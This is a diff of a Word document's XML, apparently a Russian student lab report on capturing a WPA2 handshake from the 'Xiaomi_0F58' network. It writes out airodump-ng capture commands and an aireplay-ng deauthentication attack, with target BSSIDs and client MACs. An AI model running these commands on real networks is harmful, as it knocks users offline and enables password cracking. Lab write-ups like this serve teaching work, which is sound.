-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>phy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>0]</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wlan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>0).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Проверка статуса интерфейса:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="afc"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>iwconfig</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3202,25 +3044,21 @@
       <w:r>
         <w:t>Результат: Интерфейс `</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>wlan</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>0</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>mon</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>` работает в режиме мониторинга (</w:t>
       </w:r>
@@ -3292,25 +3130,21 @@
       <w:pPr>
         <w:pStyle w:val="afc"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>sudo</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>airodump</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>-</w:t>
       </w:r>
@@ -3323,25 +3157,21 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>wlan</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>0</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>mon</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3360,255 +3190,141 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> BSSID  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">:9A:0F:59 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>PWR  -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">58 dBm </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">BSSID  50:D2:F5:9A:0F:59 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PWR  -58 dBm </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Beacons  672 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> #Data  2535 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> #/s  14 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CH  3 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> MB  130 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ENC  WPA2 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CIPHER  CCMP </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> AUTH  PSK </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Beacons  672</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> #</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Data  2535</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> #/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>s  14</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> CH  3 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> MB  130 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ENC  WPA</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>CIPHER  CCMP</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>AUTH  PSK</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ESSID  Xiaomi</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">_0F58 </w:t>
+      <w:r>
+        <w:t xml:space="preserve">ESSID  Xiaomi_0F58 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3626,89 +3342,33 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>- `</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>60:AB</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>67:E9:B6</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:94` (PWR: -70, Rate: 1e-1, Frames: 28)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>- `50:8</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>B:B9:24:EF</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:FC` (PWR: -53, Rate: 1e-1, Frames: 49)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>- `</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>36:A7:3B</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:34:8E:C8` (PWR: -34, Rate: 6e-24, Frames: 189, EAPOL)</w:t>
+        <w:t>- `60:AB:67:E9:B6:94` (PWR: -70, Rate: 1e-1, Frames: 28)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>- `50:8B:B9:24:EF:FC` (PWR: -53, Rate: 1e-1, Frames: 49)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>- `36:A7:3B:34:8E:C8` (PWR: -34, Rate: 6e-24, Frames: 189, EAPOL)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3783,15 +3443,7 @@
         </w:drawing>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Рисунок 2 – определение </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>обьекта</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> изучения</w:t>
+        <w:t>Рисунок 2 – определение обьекта изучения</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3817,15 +3469,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Для захвата </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> была выполнена команда мониторинга конкретной сети с сохранением данных в файл:</w:t>
+        <w:t>Для захвата handshake была выполнена команда мониторинга конкретной сети с сохранением данных в файл:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3835,61 +3479,99 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo airodump-ng -c 3 --bssid 50:D2:F5:9A:0F:59 -w /home/ububkm/handshake wlan0mon</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Где:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- `-c 3` — канал целевой сети (Channel 3)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- `--bssid 50:D2:F5:9A:0F:59` — MAC-адрес целевого роутера</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- `-w /home/ububkm/handshake` — путь для сохранения перехваченных данных</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- `wlan0mon` — интерфейс в режиме мониторинга</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Результат: Началось прослушивание целевой сети. Создан</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>airodump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-ng -c 3 --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>bssid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>файл</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:9A:0F:59 -w /home/ububkm/handshake wlan0mon</w:t>
+      <w:r>
+        <w:t>захвата</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> `/home/ububkm/handshake-28.cap`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc224948653"/>
+      <w:r>
+        <w:t>Принудительная деаутентификация клиента</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Для ускорения процесса получения handshake была выполнена атака деаутентификации, которая отключает клиента от сети, заставляя его переподключиться:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="afc"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo aireplay-ng -0 2 -a 50:D2:F5:9A:0F:59 wlan0mon</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3899,49 +3581,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>- `-c 3` — канал целевой сети (Channel 3)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- `--</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bssid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:9A:0F:59` — MAC-адрес целевого роутера</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- `-w /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>home</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ububkm/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` — путь для сохранения перехваченных данных</w:t>
+        <w:t>- `-0 2` — отправка 2 пакетов деаутентификации</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- `-a 50:D2:F5:9A:0F:59` — BSSID целевой точки доступа</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3950,207 +3595,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Результат: Началось прослушивание целевой сети. Создан</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>файл</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>захвата</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> `/home/ububkm/handshake-28.cap`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc224948653"/>
-      <w:r>
-        <w:t xml:space="preserve">Принудительная </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деаутентификация</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> клиента</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Для ускорения процесса получения </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> была выполнена атака </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деаутентификации</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, которая отключает клиента от сети, заставляя его </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>переподключиться</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="afc"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>aireplay</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-ng -0 2 -a </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:9A:0F:59 wlan0mon</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Где:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- `-0 2` — отправка 2 пакетов </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деаутентификации</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- `-a </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:9A:0F:59` — BSSID целевой точки доступа</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- `wlan0mon` — интерфейс в режиме мониторинга</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:r>
         <w:t>Результат атаки:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Отправлены </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DeAuth</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-пакеты (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 7) в широковещательном режиме к BSSID </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>`[50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:9A:0F:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>59]`</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>- Отправлены DeAuth-пакеты (code 7) в широковещательном режиме к BSSID `[50:D2:F5:9A:0F:59]`</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4171,32 +3623,13 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">: "Waiting for beacon frame (BSSID: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:9A:0F:59) on channel 3"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- Атака выполнялась несколько раз для повышения вероятности захвата </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>: "Waiting for beacon frame (BSSID: 50:D2:F5:9A:0F:59) on channel 3"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Атака выполнялась несколько раз для повышения вероятности захвата handshake</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4274,55 +3707,18 @@
       </w:pPr>
       <w:bookmarkStart w:id="9" w:name="_Toc224948654"/>
       <w:r>
-        <w:t xml:space="preserve">Успешный захват </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
+        <w:t>Успешный захват handshake</w:t>
